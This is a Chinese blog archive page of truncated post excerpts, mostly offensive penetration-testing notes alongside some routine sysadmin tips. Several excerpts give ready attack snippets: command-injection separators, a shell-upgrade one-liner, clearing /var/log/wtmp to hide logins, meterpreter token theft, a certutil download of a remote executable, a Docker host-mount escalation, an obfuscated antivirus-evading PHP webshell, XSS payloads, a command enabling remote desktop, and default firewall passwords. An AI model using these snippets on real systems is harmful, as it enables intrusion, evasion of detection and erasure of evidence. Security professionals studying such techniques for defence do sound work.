2021 年 5月 18 日随笔档案 - tech_lee

Windows和Linux上的管道符使用方法归纳整理

摘要： Windows管道符 “|”:直接执行后面的语句。如:ping 127.0.0.1|whoami “||”:如果前面执行的语句出错泽执行后面的语句，前面的语句智能为假如：ping 2 || whoami “&”:如果前面的语句为假则直接执行后面的语句，前面的语句可真可假如 ping 127.0. 阅读全文

posted @ 2021-05-18 11:53 tech_lee 阅读(1872) 评论(1) 推荐(0)

python调用本地shell实现交互式命令行

摘要： echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py 如果目标有python环境，可以直接在获得的shell中直接执行python -c 'import pty;pty.spawn('/bin/bas 阅读全文

posted @ 2021-05-18 11:52 tech_lee 阅读(2195) 评论(0) 推荐(0)

ubuntu消除登录痕迹

摘要：清除登录系统成功的记录 [root@localhost root]# echo > /var/log/wtmp //此文件默认打开时乱码，可查到ip等信息 [root@localhost root]# last //此时即查不到用户登录信息清除登录系统失败的记录 [root@localhost r 阅读全文

posted @ 2021-05-18 11:51 tech_lee 阅读(835) 评论(0) 推荐(0)

meterpreter常用命令

摘要： sessions -l 查看会话 backgroud 暂时退出当前会话注入进程： ps 查看进程 migrate 注入进程进程ID 一般选择explorer.exe对应的PID run vnc 查看远程桌面文件操作 cat 查看文件 edit 编辑文件 upload 上传文件 download 阅读全文

posted @ 2021-05-18 11:49 tech_lee 阅读(600) 评论(0) 推荐(0)

Windows命令查看文件MD5

摘要： D:\>certutil -hashfile md5test.txt MD5 MD5 哈希(文件 md5test.txt): d6 f6 bb 38 b5 6b 67 8f 34 9b e4 d6 2f 52 73 1f CertUtil: -hashfile 命令成功完成。 D:\>certuti 阅读全文

posted @ 2021-05-18 11:47 tech_lee 阅读(636) 评论(0) 推荐(0)

CentOS8安装PPTP VPN服务器

摘要：查看操作系统的版本： cat /etc/redhat-release 检查环境是否支持： # 是否支持PPTP modprobe ppp-compress-18 && echo support # 是否支持 TUN/TAP ls /dev/net/tun && echo support # 是否开启阅读全文

posted @ 2021-05-18 11:46 tech_lee 阅读(4) 评论(0) 推荐(0)

3389身份验证错误由于CredSSP加密数据库修正

摘要： win+R快捷键（或者开始——> 运行），输入regedit，回车，打开注册表。进入目录计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\，发现有Audit、UIPI，没有CredSS 阅读全文

posted @ 2021-05-18 11:45 tech_lee 阅读(480) 评论(0) 推荐(0)

Ubuntu20.04设置开机自启动

摘要： 0x01创建rc.local ubuntu-18.04以后默认是没有 /etc/rc.local 这个文件的，需要自己创建 sudo touch /etc/rc.local 0x02写入开机自启的脚本 #!/bin/sh echo "看到这行字，说明添加自启动脚本成功。" > /usr/local 阅读全文

posted @ 2021-05-18 11:40 tech_lee 阅读(4433) 评论(0) 推荐(0)

SQL注入笔记

摘要： [SQL注入备忘录][https://websec.ca/kb/sql_injection ] MySQL基本hack函数函数名称函数功能函数名称函数功能 system_user() 系统用户名 concat() 没有分隔符地连接字符串 user() 用户名 concat_ws() 含有分隔阅读全文

posted @ 2021-05-18 11:39 tech_lee 阅读(389) 评论(0) 推荐(0)

CSRF漏洞笔记

摘要：跨站点请求伪造（也称为CSRF）是一个Web安全漏洞，攻击者可以利用该漏洞诱使用户执行他们不打算执行的操作。它允许攻击者部分规避同源策略。漏洞利用需要具备的三个条件一个可以利用的功能，如修改密码等基于Cookie的会话处理。没有其他机制可以跟踪会话或验证用户请求。没有不可预测的请求参数几阅读全文

posted @ 2021-05-18 11:36 tech_lee 阅读(257) 评论(0) 推荐(0)

如何识别和利用HTTP Host标头漏洞

摘要：如何测试HTTP Host头漏洞基本测试将Host头设置为任意无法识别的域名，观察返回结果。如若返回正常，可以查找下响应是否有直接调用了Host的值，以此来判断如何利用。检查验证错误仅验证域名，未验证端口，端口尝试非数字是否可行 GET /example HTTP/1.1 Host: vu 阅读全文

posted @ 2021-05-18 11:35 tech_lee 阅读(1018) 评论(0) 推荐(0)

Web渗透测试内容及流程

摘要：测试介绍 web渗透测试的一般过程主要有信息获取、web结构获取、熟悉业务逻辑、日志检查、归档测试、权限测试、参数分析、会话管理、接口测试、上传下载功能测试、认证测试、业务逻辑安全测试、核心业务功能安全测试等。检测细节 web安全 SQL注入跨站脚本攻击（XSS） XML外部实体注入（XXE）阅读全文

posted @ 2021-05-18 11:33 tech_lee 阅读(1486) 评论(0) 推荐(0)

Web缓存中毒漏洞笔记

摘要：概念由非缓存键导致的差异化响应都能够被存储并提供给其他用户储备知识 Web缓存中毒的目的是发送导致有危害响应的请求，该响应将保存在缓存中并提供给其他用户。缓存通常通过CDN、负载均衡器或简单的方向代理来实现。缓存键（cache key）：通过缓存键来判断两个请求是否正在尝试加载相同的资源。阅读全文

posted @ 2021-05-18 11:31 tech_lee 阅读(1807) 评论(0) 推荐(0)

Docker命令大全

摘要：初级命令搜索镜像 docker search ubuntu //一般靠前的是官方镜像，其他是用户自己创建并分享的下载镜像 docker pull ubuntu //默认下载最新版本的列出下载的镜像 docker images 创建并使用容器 docker run -i -t --name he 阅读全文

posted @ 2021-05-18 11:29 tech_lee 阅读(152) 评论(0) 推荐(0)

nmap分阶段扫描

摘要：先扫描端口 nmap -Pn -sS -stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/nmap.txt 192.168.1.2 -Pn 不进行ping 阅读全文

posted @ 2021-05-18 11:27 tech_lee 阅读(235) 评论(0) 推荐(0)

macOS时间机器备份加速命令

摘要： sudo sysctl debug.lowpri_throttle_enabled=0 //进行备份时，关闭读写速度限制 sudo sysctl debug.lowpri_throttle_enabled=1 //备份完成后，再将其复原阅读全文

posted @ 2021-05-18 11:24 tech_lee 阅读(237) 评论(0) 推荐(0)

安全人员需要掌握的技巧（归纳整理，方便了解自己需要掌握的技能及工作要求）

摘要：安全技术 Web安全工程师职位描述对公司网站、业务系统进行安全评估测试（黑盒、白盒测试）；对公司各类系统进行安全加固；对公司安全事件进行响应，清理后门，根据日志分析攻击途径；安全技术研究，包括安全防范技术，黑客技术等；跟踪最新漏洞信息，进行业务产品的安全检查。职位要求熟悉主流的Web 阅读全文

posted @ 2021-05-18 11:19 tech_lee 阅读(220) 评论(0) 推荐(0)

文件上传——漏洞笔记

摘要：一般文件上传的流程前端选择文件，进行提交。浏览器形成POST MultiPart报文发送到服务器。服务器中间件接收到报文，解析后交给相关后端代码进行处理。后端代码将上传的文件内容写入到临时文件中（PHP特有）。写入到文件中，文件名为提交的文件名或以一定规则生成的文件名。上传漏洞原理阅读全文

posted @ 2021-05-18 11:15 tech_lee 阅读(222) 评论(0) 推荐(0)

文件包含漏洞笔记

摘要：经常在PHP语言中出现此类问题，但这并不意味着其他语言不存在。常见的函数 PHP include(),include_once(),require_once(),fopen(),readfile().... jsp/servlet ava.io.file(),java.io.filereader( 阅读全文

posted @ 2021-05-18 11:09 tech_lee 阅读(57) 评论(0) 推荐(0)

网站后台查找

摘要：字典扫描 wwwscan 御剑 dirbuster等目录爬行 awvs appscan burpsuite 开源程序默认程序的默认管理后台搜索引擎利用快照收录获取网站相关信息二级域名有部分网站后台设置在二级域名上管理端口站点有部分网站后台设置在端口网站上管理备份文件扫描获取到网站阅读全文

posted @ 2021-05-18 11:08 tech_lee 阅读(84) 评论(0) 推荐(0)

php.ini安全设置与web安全

摘要：其中包含几个关键的配置： magic_quotes_gpc 魔术引号，过滤转义四种字符，主要是针对SQL注入 safe_mod 安全模式，敏感函数被禁用，防御提权及后门调用 open_basedir 限制后门的访问目录 disable_function 可自定义禁用函数，安全模式的升级版。阅读全文

posted @ 2021-05-18 11:07 tech_lee 阅读(55) 评论(0) 推荐(0)

IIS安全设置与web安全防护

摘要：脚步执行权限保护在IIS中，对应的敏感目录右键的“目录”标签下将”执行权限“选择为”无“，即可达到此目录下不再允许脚本执行。拒绝目录及IP防护在IIS中，对应的敏感目录右键的“目录安全性”标签下，可以设置IP地址访问限制。多重密码验证防护在IIS中，对应的敏感目录右键的“目录安全性”标签下阅读全文

posted @ 2021-05-18 11:06 tech_lee 阅读(724) 评论(0) 推荐(0)

制作免杀一句话思路

摘要：函数替换函数字符串拆分组合自定义函数回调函数编码绕过比如PHP <?php $a = base64_decode('YXNzZXh4'); $a = substr_replace($a,'rt',4); $a($_POST['x']); ?> 阅读全文

posted @ 2021-05-18 10:56 tech_lee 阅读(70) 评论(0) 推荐(0)

一些DOS命令——笔记

摘要： DOS命令 type 文件名.扩展名查看文件内容 type 文件名.扩展名｜ more 分页查看 copy con 文件名编辑结束用ctrl+z 编辑大量内容到文件 del 文件名 ——删除文件 del 文件名 /q ——删除文件不需要提示 md 文件夹 —— 创建文件夹 attrib +h 阅读全文

posted @ 2021-05-18 10:55 tech_lee 阅读(44) 评论(0) 推荐(0)

使用ssh上传文件到服务器

摘要： 1、从本地传送文件到服务器将 /home 目录中的 a.jsp 文件从本地传送到服务器 /home 目录下 scp /home/a.jsp root@xxx.xxx.xxx.xxx:/home 2、从服务器下载文件到本地将服务器的 /home 目录中的a.jsp文件下载到本地的/home目录 s 阅读全文

posted @ 2021-05-18 10:53 tech_lee 阅读(579) 评论(0) 推荐(0)

Hidden属性的input标签中XSS的触发方法

摘要： <input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" /> 触发方法不同的浏览器不同，具体可参考https://www.w3school.com.cn/jsref/p 阅读全文

posted @ 2021-05-18 10:51 tech_lee 阅读(883) 评论(0) 推荐(0)

docker提权命令

摘要： docker run -v /:/mnt -it alpine 阅读全文

posted @ 2021-05-18 10:49 tech_lee 阅读(390) 评论(0) 推荐(0)

提取图片隐写中的信息

摘要： apt-get install steghide steghide info xxx.jpg //分析图片内隐藏的信息 steghide extract -sf xxx.jpg //提取图片内隐藏的压缩包阅读全文

posted @ 2021-05-18 10:48 tech_lee 阅读(387) 评论(0) 推荐(0)

zip压缩包爆破解压密码

摘要：先将xxx.zip文件转换成john可破解格式 zip2john xxx.zip >> xxx.txt 使用john破解 john --wordlist=/usr/share/wordlists/rockyou.txt xxx.txt 查看密码 john --show xxx.txt 阅读全文

posted @ 2021-05-18 10:47 tech_lee 阅读(1679) 评论(0) 推荐(0)

Windows中cmd命令查看文件是否存在

摘要：例如 attrib C:\programdata\exp.exe 有回显表示此文件存在。一般用于验证文件是否上传成功。阅读全文

posted @ 2021-05-18 10:45 tech_lee 阅读(3141) 评论(0) 推荐(0)

Windows通过命令行cmd下载远程文件

摘要： certutil.exe -urlcache -split -f http://192.168.163.128:8080/artifact.exe c:\artifact.exe // c:\artifact.exe是保存路径阅读全文

posted @ 2021-05-18 10:43 tech_lee 阅读(1581) 评论(0) 推荐(0)

tomcat设置自定义400页面

摘要： 1、修改%Tomcat_HOME%/conf/server.xml 在Host标签内新增如下内容： <Valve className="org.apache.catalina.valves.ErrorReportValve" showReport="false" showServerInfo="fa 阅读全文

posted @ 2021-05-18 10:42 tech_lee 阅读(1378) 评论(0) 推荐(0)

Ubuntu 18.04 rc-local设置开机自启动

摘要： Ubuntu 18.04默认进程启动管理已经切换至systemd，不在使用SysV。如果想像之前一样使用/etc/rc.local设置开机自启动，请如下设置修改rc-local.service /lib/systemd/system/rc-local.service新增： [Install] Wa 阅读全文

posted @ 2021-05-18 10:41 tech_lee 阅读(510) 评论(0) 推荐(0)

XSS过滤圆括号一些可执行的payload

摘要： <img src=1111111 onerror=alert(1)> <img src=1111111 onerror=javascript:alert(1&#x29> <a href="javascript:alert&#40/1/&#41">axxx</a> <sv 阅读全文

posted @ 2021-05-18 10:38 tech_lee 阅读(1400) 评论(0) 推荐(0)

Windows server 2012 R2服务器出现RC4套件漏洞缺陷的处理方案

摘要：漏洞成因 RC4这套加密方法是在20世纪末期被研究出来并在2000年左右被大量的网站所使用，但是在02年出现了漏洞且持续了13年才被一个外国大佬所发现。成因总结来说:就是加密方式太老了，长时间更换网站加密方式导致了攻击者可以进行中间人攻击，能够有效地进行大量用户的嗅探监听和会话劫持。漏洞影响攻阅读全文

posted @ 2021-05-18 10:37 tech_lee 阅读(3570) 评论(0) 推荐(0)

各个厂商防火墙的初始账号及密码

摘要：天融信登录地址 https://192.168.1.254 https://192.168.1.254:8080 用户名 superman 密码 talent 、 talent!23 技术支持热线 8008105119 联想网御需要证书（最好IE浏览器登录）登录地址 https://10.1. 阅读全文

posted @ 2021-05-18 10:35 tech_lee 阅读(9592) 评论(0) 推荐(0)

Jboss反序列化漏洞复现(CVE-2017-12149)

摘要：一、漏洞描述该漏洞为Java反序列化错误类型,存在于jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。二、漏洞影响版本 Jboss 5.x Jboss 6.x 三阅读全文

posted @ 2021-05-18 10:29 tech_lee 阅读(706) 评论(0) 推荐(0)

CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

摘要： 0x00 漏洞简介 Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar反序列化，最终造成远程代码执行。阅读全文

posted @ 2021-05-18 10:05 tech_lee 阅读(2322) 评论(0) 推荐(0)

Windows获取到meterpreter会话后的操作

摘要：说明命令查看当前用户 getuid 如果是低权限账号，我们先加载会话令牌模块 use incognito 列出会话令牌 list_tokens -u 发现有高权限账号令牌后盗取令牌 impersonate_token "NT AUTHORITY\SYSTEM" shell乱码使用此命令 chcp 阅读全文

posted @ 2021-05-18 10:03 tech_lee 阅读(371) 评论(0) 推荐(0)

cmd下开启3389

摘要：执行以下命令操作注册表来开启机器3389远程桌面服务 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 有时发现无法连接，阅读全文

posted @ 2021-05-18 10:01 tech_lee 阅读(1423) 评论(0) 推荐(0)

导航

公告